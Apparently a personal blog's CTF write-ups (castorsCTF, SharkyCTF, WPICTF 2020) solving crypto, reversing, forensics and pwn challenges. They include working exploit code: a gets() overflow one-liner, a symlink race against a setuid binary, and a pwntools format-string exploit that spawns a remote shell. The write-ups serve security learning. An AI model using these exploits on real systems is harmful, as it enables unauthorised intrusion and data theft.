the next 20 weeks to become the Ultimate Turnip Prophet!\n"""sbox=[92,74,18,190,162,125,45,159,217,153,167,179,221,151,140,100,227,83,8,4,80,75,107,85,104,216,53,90,136,133,40,20,94,32,237,103,29,175,127,172,79,5,13,177,123,128,99,203,0,198,67,117,61,152,207,220,9,232,229,120,48,246,238,210,143,7,33,87,165,111,97,135,240,113,149,105,193,130,254,234,6,76,63,19,3,206,108,251,54,102,235,126,219,228,141,72,114,161,110,252,241,231,21,226,22,194,197,145,39,192,95,245,89,91,81,189,171,122,243,225,191,78,139,148,242,43,168,38,42,112,184,37,68,244,223,124,218,101,214,58,213,34,204,66,201,180,64,144,147,255,202,199,47,196,36,188,169,186,1,224,166,10,170,195,25,71,215,52,15,142,93,178,174,182,131,248,26,14,163,11,236,205,27,119,82,70,35,23,88,154,222,239,209,208,41,212,84,176,2,134,230,51,211,106,155,185,253,247,158,56,73,118,187,250,160,55,57,16,17,157,62,65,31,181,164,121,156,77,132,200,138,69,60,50,183,59,116,28,96,115,46,24,44,98,233,137,109,49,30,173,146,150,129,12,86,249]p=[8,6,5,11,14,7,4,0,9,1,13,10,2,3,15,12]round=8defpad(s):iflen(s)%16==0:returnselse:pad_b=16-len(s)%16returns+bytes([pad_b])*pad_bdefrepeated_xor(p,k):returnbytearray([p[i]^k[i]foriinrange(len(p))])defgroup(s):return[s[i*16:(i+1)*16]foriinrange(len(s)//16)]defhash(data):state=bytearray([165,68,114,228,151,146,106,238,198,241,198,122,46,148,3,38])data=group(pad(data))forroundkeyindata:for_inrange(round):state=repeated_xor(state,roundkey)foriinrange(len(state)):state[i]=sbox[state[i]]temp=bytearray(16)foriinrange(len(state)):temp[p[i]]=state[i]state=tempreturnstate.hex()defgen_price():r=randint(1,100)ifr>=99:price=randint(500,600)elifr>=95:price=randint(450,500)elifr>=90:price=randint(400,450)elifr>=85:price=randint(350,400)elifr>=80:price=randint(300,350)elifr>=75:price=randint(250,300)elifr>=0:price=randint(20,250)returnpricedefgen_hashes_and_prices():d={"mon":{"am":0,"pm":0},"tue":{"am":0,"pm":0},"wed":{"am":0,"pm":0},"thu":{"am":0,"pm":0},"fri":{"am":0,"pm":0},"sat":{"am":0,"pm":0}}secret=bytearray(urandom(16))seed(int.from_bytes(secret,'big'))hashes=[]highest=('day-time',0)fordayind.keys():fortimeind[day].keys():price=d[day][time]=gen_price()hashes.append(hash(secret+"-".join([day,time,str(price)]).encode()))ifprice>highest[1]:highest=("-".join([day,time]),price)returnsecret.hex(),"".join(hashes),d,highestdefdisp_prices(req,d,s):req.sendall(f"\nThe secret was {s}.\n".encode())fordayind.keys():fortimeind[day].keys():req.sendall(f"{day.capitalize()}{time.upper()}: {d[day][time]}\n".encode())defchallenge(req):forninrange(20):secret,hashes,prices,highest=gen_hashes_and_prices()req.sendall(f"Price commitments for the week: {hashes}\n\n".encode())req.sendall(f"Monday AM Price: {prices['mon']['am']}\n".encode())req.sendall(f"(Week {n+1}) Enter day-time of highest price for the week: ".encode())inp=req.recv(256).strip().decode().lower()ifinp!=highest[0]:disp_prices(req,prices,secret)req.sendall(b"Try again next week.\n")exit(0)req.sendall(b'You got it!\n')else:req.sendall(f"Even Tom Nook is impressed. Here's your flag: {FLAG.decode()}".encode())exit(0)classTaskHandler(socketserver.BaseRequestHandler):defhandle(self):self.request.sendall(BANNER)self.request.sendall(MESSAGE)challenge(self.request)if__name__=='__main__':socketserver.ThreadingTCPServer.allow_reuse_address=Trueserver=socketserver.ThreadingTCPServer(('0.0.0.0',8080),TaskHandler)server.serve_forever()
Solution
I started reading it and noticed a few things which scared me sbox and hash. sbox from what I remembered had something to do with cryptography and searching online confirmed it.
I then started reading from where code was executed (skip the function definitions).
Is used to serve the challenge and seems unrelated to the problem. The handle function sends the banner and a message and then calls the challenge function which is where the core of the challenge seems to be located.
forninrange(20):secret,hashes,prices,highest=gen_hashes_and_prices()req.sendall(f"Price commitments for the week: {hashes}\n\n".encode())req.sendall(f"Monday AM Price: {prices['mon']['am']}\n".encode())req.sendall(f"(Week {n+1}) Enter day-time of highest price for the week: ".encode())inp=req.recv(256).strip().decode().lower()ifinp!=highest[0]:disp_prices(req,prices,secret)req.sendall(b"Try again next week.\n")exit(0)req.sendall(b'You got it!\n')else:req.sendall(f"Even Tom Nook is impressed. Here's your flag: {FLAG.decode()}".encode())exit(0)
The flag is sent in the else block which is reached when the for loop finishes without being exited (with a break or like in this case with exit). This means we must have inp == highest[0] 20 times consecutively. Each time represents a “week”.
We are given all hashes, the price on Monday at time “am” and are asked to enter the time of the highest price in the week. All of these values are retrieved from the function gen_hashes_and_prices.
The function gen_hashes_and_prices generates a secret using the function urandom() from the module os. I assumed this function to generate cryptographically random numbers (we can’t guess the numbers it will generate from previous numbers it generated) as I know /dev/urandom to be secure, and in fact the documentation for it confirms this is the case. It then sets the seed used by the python random module, which means that if we know the value of secret we can possibly get all the numbers generated, additionally the random module isn’t cryptographically secure which means that with enough numbers generated by it, we can guess the next numbers.
The function then iterates over the days in the week from Monday to Saturday (excluding Sunday), and for each iterates over the times “am” and “pm”. For each times (combination of day and time), it generates a price using the gen_price function and then appends to the list hashes, the value returned by the function hash, with as input a string made-up of the secret and the day of the week, time and price. If the price generated is the highest seen so far, highest is updated.
The gen_price function generates a price based on 2 calls to randint. This means that knowing the price of Monday at time “am”, means that we have one of the number generated and an estimation of another one. Because the seed used by the random function is updated each “week”, it means that each “week” is independent and we can’t use data from previous weeks to solve the following weeks.
I searched online to find how to predict numbers from the random module. I found a post the discusses it. However, the answers says that even with 40 generated numbers it is not possible to reverse the state of the number generator. Considering that for each week, only 24 numbers (2 per generated price, for 2 times for 6 days per week) are generated, it means that exploiting the random module seems out of reach.
Next I looked at the hash function. It starts with an initial state and then for each group of 16 bytes in the data, changes the state based on it.
At this point I was lost and didn’t know what to do. A teammate, Uzay, who was also looking at the challenge said that he managed to run it locally, and that it allowed to print some stuff. I followed his suggestion and added a print statement that prints the state in the hash function for each block of 16 bytes:
For each time in the day, the state was the same. This is because the data is processed in blocks of 16 bytes, and the first 16 bytes are the secret which is the same for each day of the week. (Also note that in the output, every other line is just the inital state). This means that if we were able to determine the state after the first block was processed, we could brute force the different possible prices and find the one that matched the hash we get from the server, by manually performing the processing of the second block. My initial thought was that maybe we could use some kind of “simultaneously” equation to determine that state and decided to look at the hash function, to see whether that was possible.
Looking at the hash function in reverse, I noticed that the last 2 operations of each round were reversible, they just 1. changed the order of the bytes 2. changed the bytes using the Sbox which is also reversible. The only part that isn’t reversible is the repeated_xor operation which just XORs together its 2 parameters, the roundkey (i.e. a 16 bytes block of input data), and the current state. This meant that in order to reverse it, we needed the input data which was already what we were trying to get. This is when I realised we were given the price on Monday at the “am” time, which meant that we could actually reverse the hash function until we reached the common state shared by all the hashes (i.e. the state when the hash function has only processed the secret).
So I started to write a script to do this.
#!/usr/bin/env python3
frompwnimport*sbox=[92,74,18,190,162,125,45,159,217,153,167,179,221,151,140,100,227,83,8,4,80,75,107,85,104,216,53,90,136,133,40,20,94,32,237,103,29,175,127,172,79,5,13,177,123,128,99,203,0,198,67,117,61,152,207,220,9,232,229,120,48,246,238,210,143,7,33,87,165,111,97,135,240,113,149,105,193,130,254,234,6,76,63,19,3,206,108,251,54,102,235,126,219,228,141,72,114,161,110,252,241,231,21,226,22,194,197,145,39,192,95,245,89,91,81,189,171,122,243,225,191,78,139,148,242,43,168,38,42,112,184,37,68,244,223,124,218,101,214,58,213,34,204,66,201,180,64,144,147,255,202,199,47,196,36,188,169,186,1,224,166,10,170,195,25,71,215,52,15,142,93,178,174,182,131,248,26,14,163,11,236,205,27,119,82,70,35,23,88,154,222,239,209,208,41,212,84,176,2,134,230,51,211,106,155,185,253,247,158,56,73,118,187,250,160,55,57,16,17,157,62,65,31,181,164,121,156,77,132,200,138,69,60,50,183,59,116,28,96,115,46,24,44,98,233,137,109,49,30,173,146,150,129,12,86,249]p=[8,6,5,11,14,7,4,0,9,1,13,10,2,3,15,12]defrepeated_xor(p,k):returnbytearray([p[i]^k[i]foriinrange(len(p))])defpad(s):iflen(s)%16==0:returnselse:pad_b=16-len(s)%16returns+bytes([pad_b])*pad_bround=8defunrounds(state_hash,roundkey):for_inrange(round):temp=bytearray(16)assertlen(state_hash)==16foriinrange(len(state_hash)):temp[i]=state_hash[p[i]]state_hash=tempforiinrange(len(state_hash)):state_hash[i]=sbox.index(state_hash[i])state_hash=repeated_xor(state_hash,roundkey)returnstate_hashdefhash(state,roundkey):roundkey=pad(roundkey)for_inrange(round):state=repeated_xor(state,roundkey)foriinrange(len(state)):state[i]=sbox[state[i]]temp=bytearray(16)foriinrange(len(state)):temp[p[i]]=state[i]state=tempreturnstate.hex()deffind_highest(hashes,state):d={"mon":{"am":0,"pm":0},"tue":{"am":0,"pm":0},"wed":{"am":0,"pm":0},"thu":{"am":0,"pm":0},"fri":{"am":0,"pm":0},"sat":{"am":0,"pm":0}}highest=('day-time',0)i=0fordayind.keys():fortimeind[day].keys():forpriceinrange(highest[1],601):hash_temp=hash(state,"-".join([day,time,str(price)]).encode())ifhashes[i]==hash_temp:highest=("-".join([day,time]),price)i+=1returnhighest[0]if__name__=="__main__":r=remote('chals20.cybercastors.com',14423)#r = remote('127.0.0.1', 8080)
r.recvuntil("Ultimate Turnip Prophet!\n\n")forxinrange(20):lines=r.recvuntil('price for the week: ').split(b'\n')hashes=list(map(lambdax:x.decode(),lines[0].split()[5:]))mon_am_price=lines[2].split()[3].decode()roundkey=pad("-".join(["mon","am",mon_am_price]).encode())state=unrounds(bytearray.fromhex(hashes[0]),roundkey)correct=find_highest(hashes,state)print(correct)r.sendline(correct)r.recvuntil("!\n")r.interactive()
The unrounds function does the same thing as is done for each block in the hash function of server.py, except it does it in reverse. This allows us to retrieve the state that is common to all hashes. Then in the find_highest function, I go through each time in each day (combination of day of week and “am” or “pm”), and find by brute forcing which price is correct and get the highest correct value. Once this is done, find_highest returns with the time at which the price is highest and sends it to the server.
$ ./client.py
[+] Opening connection to chals20.cybercastors.com on port 14423: Done
sat-am
thu-am
fri-am
wed-pm
sat-am
thu-am
mon-am
mon-am
sat-am
sat-pm
fri-pm
sat-am
tue-am
tue-pm
tue-pm
sat-pm
thu-am
sat-pm
wed-am
wed-am
[*] Switching to interactive mode
Even Tom Nook is impressed. Here's your flag: castorsCTF{y0u_4r3_7h3_u1t1m4t3_turn1p_pr0ph37}[*] Got EOF while reading in interactive
$
$
[*] Closed connection to chals20.cybercastors.com port 14423
[*] Got EOF while sending in interactive
Flag
castorsCTF{y0u_4r3_7h3_u1t1m4t3_turn1p_pr0ph37}
One Trick Pony (236 pts 116 solves)
Description
Author: hasu
nc chals20.cybercastors.com 14422
Solution
When you connect to the endpoint given, you get a prompt and when you type something, you get what looks like a C-string literal (It’s actually just a python byte string but I didn’t notice that when I first solved the challenge) of the same length as your input.
$ nc chals20.cybercastors.com 14422
> please give me feedback
b'\x13\r\x16\x15\x1c\x17S$=0\x1eK^VP9\x1cU\x11\x10>\x08X'
> aaaa
b'\x02\x12\x15'
> ^C
The name of the challenge “One Trick Pony”, made me think of one-time pads, so I thought of XOR-ing my input with the output we’re given:
The function FUN_0010096a replaces the last newline (\n), with a null terminator (\0). The function add_2 (renamed by myself in ghidra), adds 2 to each byte of the flag and the function FUN_001009c7, does some calculations on the bytes based on the value of the byte.
We can then reverse those functions using z3 to get the flag:
I tried to submit the flag castorsCTF{r3v3r51n6y15yfun} but it didn’t work. So I tried reproducing the code in the reverse_me binary and realised that it didn’t work for the value 0x6b (after processing), y in what I thought was the flag:
When executing it, it asks for a password and then says “Wrong!” when you enter the wrong password:
$ ./mapping
Enter Password
hunter2
Wrong!
When I opened the binary inside of ghidra I couldn’t really make sense of what was going because go uses different calling conventions then those used by C and C++. I searched online for go calling conventions and found an article that explained them. Because of this I ditched ghidra for r2. Because arguments are passed on the stack in go, you have the disable variable analysis in radare2: e anal.vars = false. By reverse engineering I was able to understand that a mapping between characters was created (with a hashmap), in the main.createMappingTable function and that in the main.apply function, the mapping was applied to the password given and it was then base64 encoded. Once those modifications had been done the password was compared to the string eHpzdG9yc1hXQXtpYl80cjFuMmgxNDY1bl80MXloMF82Ml95MDQ0MHJfNGQxbl9iNXVyMn0= which after base64 decoding gave xzstorsXWA{ib_4r1n2h1465n_41yh0_62_y0440r_4d1n_b5ur2}. I now had to reverse engineer the mapping to understand how it worked and recover the flag. The way I did it, is by sending a string containing all possible characters and then using gdb see what they were getting transformed to. Using this information I was able to make a script to decrypt the flag:
Agent, we raided one the hideouts of a wanted cyber criminal. During the raid, we extracted what appears to be a POC ransomware. It appears the he left a picture for us, but it is encrypted. It is your task to reverse engineering this sample and find out what secrets lie within the file. We managed to capture some network traffic generated by the malware. Use it during your investigation.
This was another go binary to reverse engineer. From the files we were given, it was already possible to guess that the binary had encrypted a file flag.png and we now had the encrypted version of it. The pcap would probably contain a key that was sent over the network and that would allow decryption. Looking at the disassembly in confirmed this. The binary gets seeds from a server and then sends back one of the seed which I assume was the actual seed used (I didn’t actually reverse engineer this part, to save time, as the worth case scenario of that assumption was me have to do work I should have done anyway). The binary then sets the seed used using rand.Seed. The function main.encrypt is then called. It opens the file flag.png, and then xors each of the bytes with a random value from rand.Intn(254).
Because in the .pcapng, the seed sent to the server was 1337, I wrote a little go script that generated 1500 numbers with that seed, and then a python script that xored the content of flag.png with those numbers:
Opening the files in an editor, you can see that it has a -----BEGIN CERTIFICATE----- header and -----END CERTIFICATE----- footer, because the second to last line had the = padding from base64, I decided to base64 decode the file (with the header and footer removed).
For some reason it said “invalid input”, however, I could already see that the little that had been decoded started with ELF suggesting it was an elf file. Looking at the base64 man page, I noticed the --ignore-garbage option that ignored non-alphabet characters. With this, I was able to decode the file and execute it:
$ base64 -di no_headers > out
$ ./out
Estou procurando as palavras para falar em inglês ...
Aqui vou
[Y 2 F z d G 9 y c 0 N U R n t X a D B f c z Q x Z F 9 B b l k 3 a G x u R 1 9 C M H V U X 2 0 0 d E h 9]
The message translated (from Portuguese to English) was:
I'm looking for the words to speak in English ...
Here you go
Because this was a reversing challenge, I opened it in radare2 but couldn’t find anything, the binary was just loading the text it was printing from memory and nothing else, I then realised the string outputted might be encrypted, and it turns out that it is base64.
When opening the file, it looked like a hexdump, possibly one created using the tool xxd. The first line looked like the hexdump of a jpg, as it contains the string Exif.
The last line of the hexdump looked as if it should have been the first line, as it had the offset 00000000 and also contained the magic bytes of a jpeg:
And then used xxd -r pooh.jpg correct.jpg to convert from the hexdump back into a “binary” file.
Flag
castorsCTF{H3r3_Is_y0uR_Fl4gg}
Father Taurus Kernel Import! (408 points 69 solves)
Description
Author: icinta
We found a thumb drive lying on the floor. Luckily, it wasn’t a rubber ducky or contain a ransomware; either way, we’re still suspicious. We already went ahead and created the image, help us by analyzing it.
https://bit.ly/2ZQEZyb
Solution
To solve this challenge I tried to “grep to win”, but it didn’t work, so then I tried to grep for the base64 of the flag format and found the flag:
$ grep 'castors' FloorDrive.001 # grep to win fails
$ echo -n "castorsCTF" | base64 # get the base64 of the flag format
Y2FzdG9yc0NURg==
$ grep --text -o 'Y2FzdG9yc.*' FloorDrive.001
Y2FzdG9yc0NURntmMHIzbnMxY1NfbHNfSVRzXzBXbl9iMFNTfQ==T
$ base64 -d <<< "Y2FzdG9yc0NURntmMHIzbnMxY1NfbHNfSVRzXzBXbl9iMFNTfQ=="
castorsCTF{f0r3ns1cS_ls_ITs_0Wn_b0SS}
Decompiling the program in ghidra gives the following main function:
undefined8main(void){intiVar1;charlocal_118[256];charlocal_18[16];printf("Hello everyone, say your name: ");gets(local_118);iVar1=strcmp("CyberCastors",local_18);if(iVar1==0){get_flag();}puts("You lose!");return0;}
For the get_flag function to run (which will print the flag), we must have the char array local_18, be equal to CyberCastors. This can be done by exploiting the use of the gets function.
$ python -c 'print("A" * 256 + "CyberCastors")' | nc chals20.cybercastors.com 14424
Hello everyone, say your name: castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}
The solution for this is similar to babybof1 except that the equivalent of the flag function has checks. I initially thought of bypassing these checks by just jumping inside of the winnersLevel function (the function that prints the flag (equivalent to get_flag in babybof1), after the checks. However this didn’t work because of the way the value is gotten from the stack.
To fix this I “sprayed” the stack with the value that is wanted by the winnersLevel function hoping that it would find the value there which it did:
undefined8main(void){FILE*__stream;longin_FS_OFFSET;undefinedlocal_218[256];charlocal_118[264];longlocal_10;local_10=*(long*)(in_FS_OFFSET+0x28);__stream=fopen("flag.txt","r");if(__stream==(FILE*)0x0){// WARNING: Subroutine does not returnexit(1);}__isoc99_fscanf(__stream,"%s",local_218);fclose(__stream);printf("Hello everyone, this is babyfmt! say something: ");fgets(local_118,0xff,stdin);printf(local_118);if(local_10!=*(long*)(in_FS_OFFSET+0x28)){// WARNING: Subroutine does not return__stack_chk_fail();}return0;}
As you can see, it loads the flag into memory on the stack. This means that we can exploit the format string vulnerability later in the program to get the flag:
Flag
castorsCTF{l34k_l34k_th4t_f0rm4t_str1n6_l34k}
Web
Mixed Feelings (488 points 26 solves)
Description
Author: icinta
We tried to tell Jeff that one doesn’t go with the other but he didn’t listen. Can you please pwn him and reveal his dirty secrets? Also for some reason they told us he likes XXXTentacion.
http://web1.cybercastors.com:14439/
Solution
After accessing the webpage, there is PHP-like pseudo code visible that suggests to go to /.flagkindsir. On that page there are 2 buttons that send post requests, one for cookies and the other one for puppies. If you change the value from one of those to flag, you get the flag:
Oh jeez! With all the rush I must’ve dropped the welcome !flag somewhere in the server. If only we had a bot we could command to pick it up.
Solution
To get the flag, send the message !flag on discord, a bot will message in DMs the flag.
Flag
castorsCTF{welcome_player_good_luck_and_have_fun}
Readme (50 points 363 solves)
Description
Author: hasu
I noticed something strange while reading the rules… Must be my imagination.
Solution
On the readme page, select the text next to the prizes:
Flag
castorsCTF{0u7_0f_5173_0u7_0f_m1nd}
]]>SharkyCTF 2020 The hare and the tortoise write-up2020-05-11T00:00:00+00:002020-05-11T00:00:00+00:00/ctf/writeup/2020/05/11/sharkyctf2020This weekend, with my team, I participated to Sharky CTF. We ended up 12th. Here is my write-up for the hare and the tortoise:
I’m doing a writeup for this one because I didn’t take the intended route to solve it so it might be interesting to share.
Description:
Do you know Jean de La Fontaine? A friend of mine created a program mimicking the hare and the tortoise. He told me that smart tortoises always wins. I want you to be that tortoise.
Connect with ssh tortoise@172.30.0.2. Password : tortoise.
Creator : Nofix
Attached is an OpenVPN config which gives access to a private network from which we can reach the server.
Solution
After connecting to the server (@172.30.0.2), in the home directory there are some files:
tortoise@the_hare_and_the_tortoise$ ls -l
-r-------- 1 hare hare 77 May 11 09:04 flag.txt
-r--r--r-- 1 root root 2360 May 11 09:04 main.c
-r--r--r-- 1 root root 687 May 11 09:04 semaphores.h
-r-sr-xr-x 1 hare hare 2754 May 11 09:04 the_hare_and_the_tortoise
Only the hare user has access to the flag (stored in flag.txt), and there’s a suid binary that I guess was compiled from the source code in main.c.
Here is the source code:
#include<stdlib.h>
#include<stdio.h>
#include<fcntl.h>
#include<signal.h>
#include<string.h>
#include<time.h>
#include<unistd.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<sys/mman.h>
#include<sys/ipc.h>
#include"semaphores.h"// The Hare and the Tortoise#define handle_error(msg) \
do { perror(msg); exit(EXIT_FAILURE); } while (0)
pid_tppid;intsem=-1;char*sem_name;chartemp_dir[60]={0};charlock=0;charppid_dir[30]={0};voidcleanup(){if(sem!=-1){SEM_DEL(sem);}rmdir(ppid_dir);rmdir(sem_name);}voidsigint_handler(intsigno){cleanup();exit(1);}voidalarm_handler(intsigno){cleanup();kill(ppid,SIGKILL);exit(1);}voidrandom_string(){/* Only one execution should be allowed per term */sprintf(ppid_dir,"/tmp/%d",getppid());if(mkdir(ppid_dir,0700)==-1){puts("There is no need for bruteforce");exit(1);}sprintf(temp_dir,"/tmp/%d/XXXXXX",getppid());sem_name=mkdtemp(temp_dir);if(sem_name==NULL){perror("mkdtemp failed: ");exit(1);}}intmain(intargc,char**argv){if(argc!=2){printf("Usage : %s <file to read>\n",argv[0]);exit(1);}atexit(cleanup);signal(SIGINT,sigint_handler);signal(SIGALRM,alarm_handler);random_string();sem=semget(ftok(sem_name,1337&1),1,IPC_CREAT|IPC_EXCL|0600);if(sem==-1)handle_error("semget");SEM_SET(sem,1);inthare=open(argv[1],O_RDONLY);inttortoise=open(argv[1],O_RDONLY);if(hare==-1||tortoise==-1)handle_error("open");ppid=getpid();intpid;pid=fork();intcnt=0;if(pid==0){// The hareputs("The hare says : \"Do you ever get anywhere?\"");charc;inty=1;while(y==1){SEM_WAIT(sem);y=read(hare,&c,sizeof(char));if(y==-1){alarm(0.1);handle_error("read");}usleep(100*750);SEM_POST(sem);}puts("The hare says : \"Hurry up tortoise !\"");alarm(5);sleep(10);}else{// The tortoisecharc;inty=1;while(y==1){SEM_WAIT(sem);y=read(tortoise,&c,sizeof(char));printf("The tortoise, progressing slowly... : \"%c\"\n",c);if(y==-1){handle_error("read");}SEM_POST(sem);sleep(1);}puts("Slow but steady wins the race!");}}
As you can see, a “hare” process is created (as a child) of the “tortoise” process. The “tortoise” process starts to read the file passed by argv[1] (the first argument). However, the hare process, after reading the same file a lot more quicker, sends a SIGALARM signal preventing the “tortoise” process from finishing.
$ ~/the_hare_and_the_tortoise ~/flag.txt
The tortoise, progressing slowly... : "s"
The hare says : "Do you ever get anywhere?"
The tortoise, progressing slowly... : "h"
The tortoise, progressing slowly... : "k"
The tortoise, progressing slowly... : "C"
The tortoise, progressing slowly... : "T"
The tortoise, progressing slowly... : "F"
The hare says : "Hurry up tortoise !"
The tortoise, progressing slowly... : "{"
The tortoise, progressing slowly... : "r"
The tortoise, progressing slowly... : "4"
The tortoise, progressing slowly... : "c"
Killed
After trying to understand how system V semaphores worked and not understanding anything, I fell back to a simpler solution: The “hare” and “tortoise” process each have their own file descriptor. The idea is to have the “hare” and “tortoise” process open different files. The “hare” process would open a very large file which will take time to be read, allowing the “tortoise” process to have the time to read flag.txt.
The solution I took is based on a video from liveoverflow, which I had watched earlier this year.
and then created a large file “sparse”, and a symlink to the flag inside of my working directory in /tmp.
ln-s ~/flag.txt flag
truncate-s 10G sparse
A sparse file is a file that doesn’t take space on disk (think of it like compression (I feel like some people will hate me for this definition)).
The racing.c program will swap the flag symlink and sparse file thousands of times a seconds and hopefully, when the file descriptor is opened for the “hare”, the sparse file will be the one having the name flag and the when the tortoise opens the file, the symlink to ~/flag.txt.
In one terminal, I ran the racing program that switches the files:
gcc racing.c
./a.out
And in another, I ran the suid binary on flag.
$ ~/the_hare_and_the_tortoise flag
The tortoise, progressing slowly... : ""
The hare says : "Do you ever get anywhere?"
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
$ ~/the_hare_and_the_tortoise flag
The tortoise, progressing slowly... : ""
The hare says : "Do you ever get anywhere?"
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
The tortoise, progressing slowly... : ""
$ ~/the_hare_and_the_tortoise flag
The tortoise, progressing slowly... : "s"
The hare says : "Do you ever get anywhere?"
The tortoise, progressing slowly... : "h"
The tortoise, progressing slowly... : "k"
The tortoise, progressing slowly... : "C"
The tortoise, progressing slowly... : "T"
The tortoise, progressing slowly... : "F"
The tortoise, progressing slowly... : "{"
The tortoise, progressing slowly... : "r"
The tortoise, progressing slowly... : "4"
The tortoise, progressing slowly... : "c"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "5"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "4"
The tortoise, progressing slowly... : "r"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "a"
The tortoise, progressing slowly... : "s"
The tortoise, progressing slowly... : "i"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "r"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "w"
The tortoise, progressing slowly... : "h"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "n"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "y"
The tortoise, progressing slowly... : "0"
The tortoise, progressing slowly... : "u"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "4"
The tortoise, progressing slowly... : "r"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "a"
The tortoise, progressing slowly... : "l"
The tortoise, progressing slowly... : "0"
The tortoise, progressing slowly... : "n"
The tortoise, progressing slowly... : "e"
The tortoise, progressing slowly... : "_"
The tortoise, progressing slowly... : "6"
The tortoise, progressing slowly... : "a"
The tortoise, progressing slowly... : "2"
The tortoise, progressing slowly... : "6"
The tortoise, progressing slowly... : "a"
The tortoise, progressing slowly... : "2"
The tortoise, progressing slowly... : "6"
The tortoise, progressing slowly... : "c"
The tortoise, progressing slowly... : "5"
The tortoise, progressing slowly... : "7"
The tortoise, progressing slowly... : "f"
The tortoise, progressing slowly... : "0"
The tortoise, progressing slowly... : "0"
The tortoise, progressing slowly... : "1"
The tortoise, progressing slowly... : "2"
The tortoise, progressing slowly... : "e"
The tortoise, progressing slowly... : "d"
The tortoise, progressing slowly... : "6"
The tortoise, progressing slowly... : "6"
The tortoise, progressing slowly... : "a"
The tortoise, progressing slowly... : "b"
The tortoise, progressing slowly... : "8"
The tortoise, progressing slowly... : "c"
The tortoise, progressing slowly... : "2"
The tortoise, progressing slowly... : "0"
The tortoise, progressing slowly... : "e"
The tortoise, progressing slowly... : "5"
The tortoise, progressing slowly... : "3"
The tortoise, progressing slowly... : "8"
The tortoise, progressing slowly... : "a"
The tortoise, progressing slowly... : "0"
The tortoise, progressing slowly... : "4"
The tortoise, progressing slowly... : "}"
The tortoise, progressing slowly... : "}"
Slow but steady wins the race!
After multiple tries, the tortoise opened the symlink to flag.txt instead of the sparse file and I was able to transform the lines into a flag:
Thank you to seanjpagano, for your writeup which I used in order to get the files.
]]>Dorsia3 without gadgets (WPICTF 2020)2020-04-20T00:00:00+00:002020-04-20T00:00:00+00:00/ctf/writeup/2020/04/20/wpictf2020-dorsia3-without-gadgetsWhy this writeup?
After the end of WPICTF, I looked at writeups so see how people solved different challenges, and realised that for dorsia1 and dorsia3, people had used a completely different approach, using magic gadgets, than the one I took, so I thought I would share what I did.
dorsia3 250pts (55 solves)
Challenge Description:
http://us-east-1.linodeobjects.com/wpictf-challenge-files/dorsia.webm The third card.
nc dorsia3.wpictf.xyz 31337 or 31338 or 31339
made by: awg
Because, the program is printing untrusted user input with printf, a format string vulnerability can be exploited. We are also given the address of the buffer and the system function.
With some local testing, with GDB, I realised that the return address was 113 bytes after the address of the buffer a. %n will set the number of bytes written to the address pointed to by the pointed given as argument. So what we do, is we set the address of system, where the return pointer is and then set a pointer to /bin/sh, where system expects to find its first argument, in my case that was 121 bytes after the location of a.
The final exploit:
#!/usr/bin/env python
frompwnimport*ifFalse:# if True, run the exploit locally, otherwise, run it remotely
r=process("./nanoprint")libc=ELF("/usr/lib32/libc.so.6")else:r=remote('dorsia3.wpictf.xyz',31337)libc=ELF("./libc.so.6")line=r.recvline().decode()# Read the address of `a` and `system`
a=int(line[:10],16)system=int(line[10:],16)+288libc.address=system-libc.symbols['system']bin_sh=next(libc.search(b'/bin/sh'))lsb_sys=system&0xffffmsb_sys=system>>16lsb_sh=bin_sh&0xffffmsb_sh=bin_sh>>16values=[(lsb_sys,7),(msb_sys,8),(lsb_sh,9),(msb_sh,10)]values=sorted(values)# A 1 byte padding is needed so that printf uses the correct arguments
payload=b"A"payload+=p32(a+113)payload+=p32(a+115)payload+=p32(a+121)payload+=p32(a+123)written=17# 4 * 4 + 1; 4 bytes for each address and 1 byte for the "A"
forvalueinvalues:payload+=f"%{value[0]-written}x".encode()written=value[0]payload+=f"%{value[1]}$n".encode()r.sendline(payload)r.recvline()# The output of `printf`
r.interactive()
I trick I used, which I doubt the usefulness of is sorting the addresses I need to write to by the value they should have. This in theory means that less data has to be sent back when printf is executed on the server side. However it is not necessary.
Initially, I tried to use a /bin/sh that was inside of a however, that failed so I fell back to using one inside of libc.
After running the exploit, we get a shell on the target, running ls reveals that the flag is in the current directory and we can now just cat it:
$ ./exploit.py
[+] Opening connection to dorsia3.wpictf.xyz on port 31337: Done
[*] 'wpictf_2020/dorsia3/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Switching to interactive mode
$ ls
flag.txt
nanoprint
run_problem.sh
stdbuf
$ cat flag.txt
WPI{Th3re_is_an_idea_of_4_Pa7rick_BatemaN}
This however, isn’t the easiest way to solve the challenge as it is takes more time. If you haven’t already, I’d recommend reading other write-ups as well to explore the different methods that can be used.
